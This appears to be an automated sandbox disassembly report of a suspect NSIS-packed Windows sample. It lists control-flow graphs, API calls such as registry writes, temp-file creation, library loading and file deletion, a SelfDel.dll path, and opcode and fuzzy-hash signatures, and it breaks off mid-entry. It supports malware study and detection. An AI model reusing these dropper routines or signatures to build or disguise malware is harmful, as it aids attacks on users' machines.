                                  • Not Executed
                                  control_flow_graph 353 401794-4017b9 call 402dcb call 405e9a 358 4017c3-4017d5 call 406554 call 405e23 lstrcatW 353->358 359 4017bb-4017c1 call 406554 353->359 364 4017da-4017db call 406802 358->364 359->364 368 4017e0-4017e4 364->368 369 4017e6-4017f0 call 4068b1 368->369 370 401817-40181a 368->370 378 401802-401814 369->378 379 4017f2-401800 CompareFileTime 369->379 371 401822-40183e call 406044 370->371 372 40181c-40181d call 40601f 370->372 380 401840-401843 371->380 381 4018b2-4018db call 4055d9 call 4032d9 371->381 372->371 378->370 379->378 382 401894-40189e call 4055d9 380->382 383 401845-401883 call 406554 * 2 call 406591 call 406554 call 405bb4 380->383 395 4018e3-4018ef SetFileTime 381->395 396 4018dd-4018e1 381->396 393 4018a7-4018ad 382->393 383->368 415 401889-40188a 383->415 398 402c58 393->398 397 4018f5-401900 CloseHandle 395->397 396->395 396->397 400 401906-401909 397->400 401 402c4f-402c52 397->401 402 402c5a-402c5e 398->402 404 40190b-40191c call 406591 lstrcatW 400->404 405 40191e-401921 call 406591 400->405 401->398 412 401926-4023c7 call 405bb4 404->412 405->412 412->402 419 402953-40295a 412->419 415->393 417 40188c-40188d 415->417 417->382 419->401
                                  APIs
                                  • lstrcatW.KERNEL32(00000000,00000000,Del,C:\Users\user\AppData\Local\Temp\nsiFE19.tmp,?,?,00000031), ref: 004017D5
                                  • CompareFileTime.KERNEL32(-00000014,?,Del,Del,00000000,00000000,Del,C:\Users\user\AppData\Local\Temp\nsiFE19.tmp,?,?,00000031), ref: 004017FA
                                    • Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406561
                                    • Part of subcall function 004055D9: lstrlenW.KERNEL32(007A0728,00000000,00798B00,74DF23A0,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
                                    • Part of subcall function 004055D9: lstrlenW.KERNEL32(0040341A,007A0728,00000000,00798B00,74DF23A0,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
                                    • Part of subcall function 004055D9: lstrcatW.KERNEL32(007A0728,0040341A,0040341A,007A0728,00000000,00798B00,74DF23A0), ref: 00405634
                                    • Part of subcall function 004055D9: SetWindowTextW.USER32(007A0728,007A0728), ref: 00405646
                                    • Part of subcall function 004055D9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
                                    • Part of subcall function 004055D9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
                                    • Part of subcall function 004055D9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp$C:\Users\user\AppData\Local\Temp\nsiFE19.tmp$C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SelfDel.dll$Del
                                  • API String ID: 1941528284-759604445
                                  • Opcode ID: a2c4ba2b1575994442f4eda3782f903add88faf4951f8c682e70490475c3a32a
                                  • Instruction ID: 1e9ca80c6a5dacc7cd580e770cf15d3f22a044297d5b9cee136244b7a600bee5
                                  • Opcode Fuzzy Hash: a2c4ba2b1575994442f4eda3782f903add88faf4951f8c682e70490475c3a32a
                                  • Instruction Fuzzy Hash: C441E871400104BADF11BBB5DD85DBE3AB5EF45329B21823FF012B10E1DB3C8A91966D

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 420 4032d9-4032f0 421 4032f2 420->421 422 4032f9-403302 420->422 421->422 423 403304 422->423 424 40330b-403310 422->424 423->424 425 403320-40332d call 4034d1 424->425 426 403312-40331b call 4034e7 424->426 430 403333-403337 425->430 431 4034bf 425->431 426->425 432 40346a-40346c 430->432 433 40333d-403363 GetTickCount 430->433 434 4034c1-4034c2 431->434 435 4034ac-4034af 432->435 436 40346e-403471 432->436 437 4034c7 433->437 438 403369-403371 433->438 439 4034ca-4034ce 434->439 442 4034b1 435->442 443 4034b4-4034bd call 4034d1 435->443 436->437 444 403473 436->444 437->439 440 403373 438->440 441 403376-403384 call 4034d1 438->441 440->441 441->431 453 40338a-403393 441->453 442->443 443->431 454 4034c4 443->454 447 403476-40347c 444->447 450 403480-40348e call 4034d1 447->450 451 40347e 447->451 450->431 457 403490-40349c call 4060f6 450->457 451->450 456 403399-4033b9 call 406aa3 453->456 454->437 462 403462-403464 456->462 463 4033bf-4033d2 GetTickCount 456->463 464 403466-403468 457->464 465 40349e-4034a8 457->465 462->434 466 4033d4-4033dc 463->466 467 40341d-40341f 463->467 464->434 465->447 468 4034aa 465->468 469 4033e4-40341a MulDiv wsprintfW call 4055d9 466->469 470 4033de-4033e2 466->470 471 403421-403425 467->471 472 403456-40345a 467->472 468->437 469->467 470->467 470->469 473 403427-40342e call 4060f6 471->473 474 40343c-403447 471->474 472->438 475 403460 472->475 480 403433-403435 473->480 478 40344a-40344e 474->478 475->437 478->456 481 403454 478->481 480->464 482 403437-40343a 480->482 481->437 482->478
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: CountTick$wsprintf
                                  • String ID: ... %d%%
                                  • API String ID: 551687249-2449383134
                                  • Opcode ID: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
                                  • Instruction ID: eb1ee041d621481d77111d3da967b5f6536357fdff7ba477760ccc35d22143eb
                                  • Opcode Fuzzy Hash: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
                                  • Instruction Fuzzy Hash: FD515F71910219EBCF11CF65DA8469E7FA8AB00756F14417BE804BA2C1C7789B41CBAA

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 483 4068d8-4068f8 GetSystemDirectoryW 484 4068fa 483->484 485 4068fc-4068fe 483->485 484->485 486 406900-406909 485->486 487 40690f-406911 485->487 486->487 488 40690b-40690d 486->488 489 406912-406945 wsprintfW LoadLibraryExW 487->489 488->489
                                  APIs
                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068EF
                                  • wsprintfW.USER32 ref: 0040692A
                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040693E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                  • String ID: %s%S.dll$UXTHEME
                                  • API String ID: 2200240437-1106614640
                                  • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                  • Instruction ID: 3d91c3bba12f32b4d8e24f08bfb099957206232b6387f0edcfac50a9fed73821
                                  • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                  • Instruction Fuzzy Hash: 80F0F671501219ABDB20BB68DD0EF9B376CAB00304F10447AA546F10E0EB789B69CB98

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 490 4024af-4024e0 call 402dcb * 2 call 402e5b 497 4024e6-4024f0 490->497 498 402c4f-402c5e 490->498 500 4024f2-4024ff call 402dcb lstrlenW 497->500 501 402503-402506 497->501 500->501 504 402508-402519 call 402da9 501->504 505 40251a-40251d 501->505 504->505 506 40252e-402542 RegSetValueExW 505->506 507 40251f-402529 call 4032d9 505->507 512 402544 506->512 513 402547-402628 RegCloseKey 506->513 507->506 512->513 513->498 515 402953-40295a 513->515 515->498
                                  APIs
                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiFE19.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 004024FA
                                  • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsiFE19.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 0040253A
                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsiFE19.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402622
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: CloseValuelstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp
                                  • API String ID: 2655323295-843063114
                                  • Opcode ID: 1f98af66c98e622ea097f2737b7b91c500bbd897f6573687ec4a0a2fb9e2066a
                                  • Instruction ID: b5124b365774ee0dd77fffeda1a995c18ababb59e8a55150708f98195cc7d2d6
                                  • Opcode Fuzzy Hash: 1f98af66c98e622ea097f2737b7b91c500bbd897f6573687ec4a0a2fb9e2066a
                                  • Instruction Fuzzy Hash: B8117231D00114BEDB01EFA59E59AAEB6B4EF54358F20443FF504B61D1C7B88E40966C

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 516 405f2b-405f46 call 406554 call 405ece 521 405f48-405f4a 516->521 522 405f4c-405f59 call 406802 516->522 523 405fa4-405fa6 521->523 526 405f69-405f6d 522->526 527 405f5b-405f61 522->527 528 405f83-405f8c lstrlenW 526->528 527->521 529 405f63-405f67 527->529 530 405f8e-405fa2 call 405e23 GetFileAttributesW 528->530 531 405f6f-405f76 call 4068b1 528->531 529->521 529->526 530->523 536 405f78-405f7b 531->536 537 405f7d-405f7e call 405e6f 531->537 536->521 536->537 537->528
                                  APIs
                                    • Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406561
                                    • Part of subcall function 00405ECE: CharNextW.USER32(?,?,007A3F50,?,00405F42,007A3F50,007A3F50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,74DF3420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405EDC
                                    • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EE1
                                    • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EF9
                                  • lstrlenW.KERNEL32(007A3F50,00000000,007A3F50,007A3F50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,74DF3420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405F84
                                  • GetFileAttributesW.KERNELBASE(007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,00000000,007A3F50,007A3F50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F94
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\$P?z
                                  • API String ID: 3248276644-3492887852
                                  • Opcode ID: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
                                  • Instruction ID: f4f6e0775867387827aab8404002f3e8856b431f62ec50d584846b16db6dccac
                                  • Opcode Fuzzy Hash: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
                                  • Instruction Fuzzy Hash: 9BF02D36105E5319D62273365C09AAF1544CF86358709057BF852B12D5CF3C8A53CC7E

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 539 406073-40607f 540 406080-4060b4 GetTickCount GetTempFileNameW 539->540 541 4060c3-4060c5 540->541 542 4060b6-4060b8 540->542 544 4060bd-4060c0 541->544 542->540 543 4060ba 542->543 543->544
                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00406091
                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040352D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819), ref: 004060AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: CountFileNameTempTick
                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                  • API String ID: 1716503409-678247507
                                  • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                  • Instruction ID: 3a9c7f2d553a521e2ba94e631897efa79da28a954d47360b9b57a106d7dab247
                                  • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                  • Instruction Fuzzy Hash: 83F09076B40204BFEB00CF69ED05F9EB7ACEB95750F11803AED05F7180E6B099548768

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 545 4015e6-4015fa call 402dcb call 405ece 550 401656-401659 545->550 551 4015fc-40160f call 405e50 545->551 553 401688-40231b call 401423 550->553 554 40165b-40167a call 401423 call 406554 SetCurrentDirectoryW 550->554 559 401611-401614 551->559 560 401629-40162c call 405b02 551->560 567 402c4f-402c5e 553->567 554->567 571 401680-401683 554->571 559->560 564 401616-40161d call 405b1f 559->564 568 401631-401633 560->568 564->560 575 40161f-401622 call 405aa8 564->575 573 401635-40163a 568->573 574 40164c-401654 568->574 571->567 577 401649 573->577 578 40163c-401647 GetFileAttributesW 573->578 574->550 574->551 580 401627 575->580 577->574 578->574 578->577 580->568
                                  APIs
                                    • Part of subcall function 00405ECE: CharNextW.USER32(?,?,007A3F50,?,00405F42,007A3F50,007A3F50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,74DF3420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405EDC
                                    • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EE1
                                    • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EF9
                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                    • Part of subcall function 00405AA8: CreateDirectoryW.KERNELBASE(007AB800,?), ref: 00405AEA
                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\nsiFE19.tmp,?,00000000,000000F0), ref: 00401672
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\nsiFE19.tmp, xrefs: 00401665
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp
                                  • API String ID: 1892508949-843063114
                                  • Opcode ID: 60c2c0ddde8b7e5a5259822198f5dfbdca4b1fe95804475fb22a6f2f1a41da81
                                  • Instruction ID: 2b03c7a92312b5a1b0d009ad41e3f6a941738229f321331d68055a18e38198b9
                                  • Opcode Fuzzy Hash: 60c2c0ddde8b7e5a5259822198f5dfbdca4b1fe95804475fb22a6f2f1a41da81
                                  • Instruction Fuzzy Hash: 4511D031504514EBCF207FA5CD056AF36A0EF04368B25493FE941B22F1D63D4A81DA5E

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 581 4020fd-402109 582 4021c8-4021ca 581->582 583 40210f-402125 call 402dcb * 2 581->583 584 402316-40231b call 401423 582->584 592 402135-402144 LoadLibraryExW 583->592 593 402127-402133 GetModuleHandleW 583->593 590 402c4f-402c5e 584->590 595 402146-402155 call 4069b7 592->595 596 4021c1-4021c3 592->596 593->592 593->595 600 402190-402195 call 4055d9 595->600 601 402157-40215d 595->601 596->584 605 40219a-40219d 600->605 603 402176-402186 601->603 604 40215f-40216b call 401423 601->604 609 40218b-40218e 603->609 604->605 614 40216d-402174 604->614 605->590 607 4021a3-4021ad call 403bc6 605->607 607->590 613 4021b3-4021bc FreeLibrary 607->613 609->605 613->590 614->605
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402128
                                    • Part of subcall function 004055D9: lstrlenW.KERNEL32(007A0728,00000000,00798B00,74DF23A0,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
                                    • Part of subcall function 004055D9: lstrlenW.KERNEL32(0040341A,007A0728,00000000,00798B00,74DF23A0,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
                                    • Part of subcall function 004055D9: lstrcatW.KERNEL32(007A0728,0040341A,0040341A,007A0728,00000000,00798B00,74DF23A0), ref: 00405634
                                    • Part of subcall function 004055D9: SetWindowTextW.USER32(007A0728,007A0728), ref: 00405646
                                    • Part of subcall function 004055D9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
                                    • Part of subcall function 004055D9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
                                    • Part of subcall function 004055D9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694
                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402139
                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 004021B6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                  • String ID:
                                  • API String ID: 334405425-0
                                  • Opcode ID: 297150e83417b5866f3c74e4a486ab5a4ba485464345ec717dcdc95307e67a96
                                  • Instruction ID: 73d72cb5994b484f29e4ff80cb350354ef05bb92eb19bb99874f54bc55697afd
                                  • Opcode Fuzzy Hash: 297150e83417b5866f3c74e4a486ab5a4ba485464345ec717dcdc95307e67a96
                                  • Instruction Fuzzy Hash: EF21A131904104EACF10AFA5CF89A9E7A71BF54359F30413FF105B91E5DBBD89829A2E

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 615 401bc0-401bcb 616 401c11-401c14 615->616 617 401bcd-401bd0 615->617 620 401c16-401c18 616->620 621 401c3b-401c51 GlobalAlloc call 406591 616->621 618 401bd6-401bda 617->618 619 4023af-4023c7 call 406591 call 405bb4 617->619 618->617 624 401bdc-401bde 618->624 625 402953-40295a 619->625 636 402c5a-402c5e 619->636 620->625 626 401c1e-401c36 call 406554 GlobalFree 620->626 629 401c56-401c63 621->629 624->619 631 401be4-402abe call 406554 * 3 624->631 627 402c4f-402c58 625->627 626->627 627->636 629->627 631->627
                                  APIs
                                  • GlobalFree.KERNEL32(00995688), ref: 00401C30
                                  • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C42
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: Global$AllocFree
                                  • String ID: Del
                                  • API String ID: 3394109436-3562819231
                                  • Opcode ID: a35846d0fa1f5f62d1cc44f85dbd038e6f418717e16ba0fa97b0d6e40a5ea598
                                  • Instruction ID: 6559a21230efabb52023b21709d08c05de394b4458a3aca8e6f4fe2726326e98
                                  • Opcode Fuzzy Hash: a35846d0fa1f5f62d1cc44f85dbd038e6f418717e16ba0fa97b0d6e40a5ea598
                                  • Instruction Fuzzy Hash: 6A216F73904110ABDB20FBA8DEC5A5E72E4AB08324715053BE552B72D5C6BCA8819B9D

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 645 405c18-405c29 call 40601f 648 405c59 645->648 649 405c2b-405c31 645->649 652 405c5b-405c5d 648->652 650 405c33-405c39 RemoveDirectoryW 649->650 651 405c3b DeleteFileW 649->651 653 405c41-405c43 650->653 651->653 654 405c45-405c48 653->654 655 405c4a-405c4f 653->655 654->652 655->648 656 405c51-405c53 SetFileAttributesW 655->656 656->648
                                  APIs
                                    • Part of subcall function 0040601F: GetFileAttributesW.KERNELBASE(?,?,00405C24,?,?,00000000,00405DFA,?,?,?,?), ref: 00406024
                                    • Part of subcall function 0040601F: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406038
                                  • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405DFA), ref: 00405C33
